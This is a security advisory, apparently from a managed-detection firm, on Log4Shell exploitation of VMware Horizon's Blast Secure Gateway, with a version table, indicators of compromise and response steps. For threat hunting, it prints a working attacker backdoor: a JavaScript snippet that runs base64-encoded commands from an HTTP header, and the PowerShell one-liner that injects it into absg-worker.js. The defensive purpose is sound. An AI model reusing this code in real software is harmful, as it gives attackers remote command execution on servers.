Advisory on log4Shell VMWare Horizon

Introduction

If you have VMWare Horizon in your organization, this message may be very important for you to secure your IT infrastructure. Your organization can be penetrated and hacked at any time.

We analyzed a successful exploitation of the “Log4shell” vulnerability CVE-2021-44228 on a VMWare Horizon component: Blast Secure Gateway.

This component, when enabled, allows clients to access remote desktops and applications from the Internet.

If you don’t have VMWare Horizon in your organization, you can ignore this advisory.

Here’s a table where you can verify if your VMWare Horizon is vulnerable to CVE-2021-44228 and CVE-2021-45046:

Version	Vulnerability status	Mitigation
2111	Build 19067837 (release date 12/16/2021) is not vulnerable. Build 19052438 (release date 12/14/2021) is vulnerable to CVE-2021-45046 (only if the HTML Access portal is installed). Build 18964782 (release date 11/30/2021) is vulnerable to both (only if the HTML Access portal is installed).	Manual Mitigation for Horizon Connection Server Scripted Mitigation for Horizon Connection Server, Agent for Windows, HTML Access portal https://kb.vmware.com/s/article/87073#Manual_Mitigation_for_Horizon_Connection_Server
2006, 2012, 2103, 2106	Vulnerable (only if HTML Access portal is installed) and should be updated to 2111. -worker.js
7.13.1	Build 19069458 (release date 12/16/2021) is not vulnerable. Build 18057992 (release date 5/25/2021) is vulnerable to both (only if the HTML Access portal is installed).
7.13.0	Vulnerable (only if HTML Access portal is installed) and should be updated to 7.13.1.
7.10.3	Build 19069415 (release date 12/17/2021) is not vulnerable. Build 17056980 (release date 10/22/2020) is vulnerable to both (only if the HTML Access portal is installed).
7.10.0 – 7.10.2	Vulnerable (only if HTML Access portal is installed) and should be updated to 7.10.3
7.4.0-7.9.0, 7.12.0, 7.11.0	Vulnerable (only if HTML Access portal is installed) but are out of support and should be updated with a supported version.

The investigation is still ongoing, but we already have evidence of malicious activities that you can look for in your systems.

Specifically, the actor installed a backdoor in a Javascript library that is part of the Blast Secure Gateway:

[root]\Program Files\VMWare\VMWare View\Server\appblastgateway\lib\absg-worker.js

The backdoor is waiting for a specific string in the HTTP request to decode a base64-encoded payload and possibly execute it under the “replyError” function:

Snippet 1

if
(String(req.url).includes('lxmvvZ3S4o250Tw22Z9vTao0cJFmkplDoi828cVwQtZVj3eUbb'))
{
try {
replyError(req, res, 200,
require('child_process').execSync(
                        Buffer.from(req.headers['data'],
'base64').toString('ascii')
                    ).toString());
                }
                catch (err) {
                    replyError(req, res, 400, err.stderr.toString());
                }
                return;
            }

Backdoor insertion is performed through a Powershell script. This script is decoded from a malicious Java class downloaded and executed after successful exploitation of the CVE-2021-44228 (also known as log4shell):

Snippet 2

powershell -c $path=gwmi win32_service|?{$_.Name -like “*VMBlastSG*”}|%{$_.PathName -replace ‘”‘, ” -replace “nssm.exe”,”lib\absg-worker.js”};$expr=”req.connection.end();`r`n`t`t`t}`r`n`r`n`t`t`tif (String(req.url).includes(‘lxmvvZ3S4o250Tw22Z9vTao0cJFmkplDoi828cVwQtZVj3eUbb’)) {`r`n`t`t`t`ttry {`r`n`t`t`t`t`treplyError(req, res, 200, require(‘child_process’).execSync(`r`n`t`t`t`t`t`tBuffer.from(req.headers[‘data’], ‘base64’).toString(‘ascii’)`r`n`t`t`t`t`t).toString());`r`n`t`t`t`t}`r`n`t`t`t`tcatch (err) {`r`n`t`t`t`t`treplyError(req, res, 400, err.stderr.toString());`r`n`t`t`t`t}`r`n`t`t`t`treturn;”;(Get-Content $path)|ForEach-Object {$_ -replace “req.connection.end\;”, $expr}|Set-Content $path;Restart-Service -Force VMBlastSG

We have already performed extensive hunting on all available logs we receive from your organization and found no exploitation evidence, but we might not have full visibility.

Hence, here’s a list of potential IOCs (Indicator of Compromise) you can look for if you have VMWare Horizon – VMWare Blast Gateway:

IOC	Location	Description
lxmvvZ3S4o250Tw22Z9vTao0cJFmkplDoi828cVwQtZVj3eUbb	Reverse proxy logs, Powershell logs	String “Id” for the backdoor activation
Snippet 1	On the VMWare Horizon server machine [root]\Program Files\VMWare\VMWare View\Server\appblastgateway\lib\absg-worker.js	Actual backdoor
Snippet 2	On the VMWare Horizon Server machine Powershell logs under Applications and Services Logs > PowerShellCore > Operational	Evidence of the malicious Java class being decoded

We have no evidence of the backdoor being used now, nor on the post-exploitation steps. Information on the threat actor seems to point towards gathering credentials available on the host using LSASS dumping techniques.

Don’t

Patch before verifying that the backdoor is present.
Revert the VM Horizon to a previous snapshot without making sure that you store the infected one for forensics.
Modify the machine once found infected.
Shutdown the machine before performing the snapshot or contacting us.

Do

Verify if you have VMWare Horizon
Verify its version, if not vulnerable any further action is required
If vulnerable, take a live snapshot of the machine before performing further actions
Once a snapshot of the powered-on machine has been taken, verify the backdoor presence
If no backdoor is present, proceed with the mitigation
If the backdoor is present, disconnect the machine from the network and contact us

Hacknowledge’s reaction

We have already performed extensive searches on all available logs
We are in contact with the Confederation CERT (GovCERT) to share IOCs and TTPs
We create this piece of advisory to inform proactively our clients

Sources

Advisory on log4Shell VMWare Horizon

Introduction

Don’t

Do

Hacknowledge’s reaction

Services

Monitoring Offer

Resources

Hacknowledge SA

Hacknowledge Lux SA